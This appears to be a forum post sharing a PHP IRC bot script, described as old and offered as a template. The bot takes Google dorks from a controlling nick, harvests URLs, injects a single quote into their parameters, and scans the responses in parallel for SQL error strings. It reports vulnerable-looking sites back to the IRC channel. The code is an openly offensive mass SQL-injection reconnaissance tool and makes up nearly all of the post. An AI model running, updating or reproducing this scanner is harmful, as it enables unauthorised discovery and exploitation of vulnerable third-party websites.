Hey guys,
This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.
This one comes from the Dark Ages of GRnet, enjoy 🙂
In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.
<?php
set_time_limit(0);
/**
 * @author Atlantean.
 */
//########################INFORMATION##################################
$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");
//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!
//#####################################################################
$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
   "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
   "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
   echo "\n[-]Unable To connect...\n\n\n";
   exit;
}
socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");
//###############################Encode The Dork#############################
function encodeDork($s)
{
   $tmp = "";
   for ($i = 0; $i < strlen($s); $i++)
   {
       $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
   }
   return urlencode($tmp);
}
//###############################cURL MULTI THREAD#############################
function ExecHandle(&$curlHandle)
{
   $flag = null;
   do
   {
       curl_multi_exec($curlHandle, $flag);
   } while ($flag > 0);
}
while ($read = socket_read($socket, 2048))
{
   $cmd = explode(" ", $read);
   $nick = explode(':', $cmd[0]);
   $nick = explode('!', $nick[1]);
   $nick = strtolower($nick[0]);
   switch ($cmd[1])
   {
       case "KICK":
           if ($cmd[3] == $me)
           {
               socket_write($socket, "\nJOIN :" . $channel . "\n");
           }
           break;
       case "PRIVMSG":
           if (in_array($nick, $master))
           {
               switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
               {
                   case ":!join":
                       socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                       break;
                   case ":!exit":
                       exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                       break;
                   case ":!part":
                       socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                       break;
                   case ":!sql":
                       if (!isset($cmd[4]))
                       {
                           socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                               "12[-] Enter Dork!\r\n");
                       } else
                       {
                           socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                               "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                               chr(3) . "12[+] Dork : $cmd[4] \r\n");
                           $vuln_array = array();
                           $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";
                           $ch = curl_init($google);
                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                           curl_setopt($ch, CURLOPT_HEADER, 0);
                           $ret = curl_exec($ch);
                           curl_close($ch);
                           if (stristr($ret, '302 Moved') != false)
                           {
                               socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                               break;
                           }
                           preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                           $max = str_replace(",", "", $max[2][0]);
                           $max = $max > $max_results ? $max_results : $max;
                           $i = 0;
                           while ($i < $max)
                           {
                               $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                               curl_setopt($ch, CURLOPT_HEADER, 0);
                               $ret = curl_exec($ch);
                               preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);
                               if (@$links[1])
                               {
                                   foreach ($links[1] as $l)
                                   {
                                       if (strpos($l, '=') != false)
                                       {
                                           $url = explode('=', $l);
                                           $url = $url[0] . "='";
                                           if (!in_array($url, $vuln_array))
                                           {
                                               array_push($vuln_array, $url);
                                           }
                                       }
                                   }
                               }
                               curl_close($ch);
                               $i = $max > 10 ? $i += 10 : $i++;
                           }
                           array_unique($vuln_array);
                           sort($vuln_array);
                           socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");
                           $p = 0;
                           $o = $threads;
                           $curlHandle = curl_multi_init();
                           do
                           {
                               $tmp = count($vuln_array);
                               for ($i = 0; $i < $threads && $i < $tmp; $i++)
                               {
                                   $cURL[$i] = curl_init($vuln_array[$i]);
                                   curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                   curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                   curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                   curl_multi_add_handle($curlHandle, $cURL[$i]);
                               }
                               ExecHandle($curlHandle);
                               for ($i = 0; $i < $threads && $i < $tmp; $i++)
                               {
                                   $source[$i] = curl_multi_getcontent($cURL[$i]);
                               }
                               for ($i = 0; $i < $threads && $i < $tmp; $i++)
                               {
                                   foreach ($search as $error)
                                   {
                                       if (stristr($source[$i], $error) != false)
                                       {
                                           socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                               "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                           $p++;
                                           break;
                                       }
                                   }
                               }
                               for ($i = 0; $i < $threads && $i < $tmp; $i++)
                               {
                                   curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                   unset($vuln_array[$i]);
                               }
                               sort($vuln_array);
                               socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                   "12[+] Scanned $o...\r\n");
                               $o += $threads;
                               unset($source);
                               unset($cURL);
                           } while (count($vuln_array) > 0);
                           curl_multi_close($curlHandle);
                           unset($vuln_array);
                           unset($source);
                           unset($cURL);
                           socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                       }
                       break;
               }
           }
           break;
   }
   if ($cmd[0] == "PING")
   {
       socket_write($socket, "PONG " . $cmd[1] . "\n");
   }
}
socket_close($socket);
?>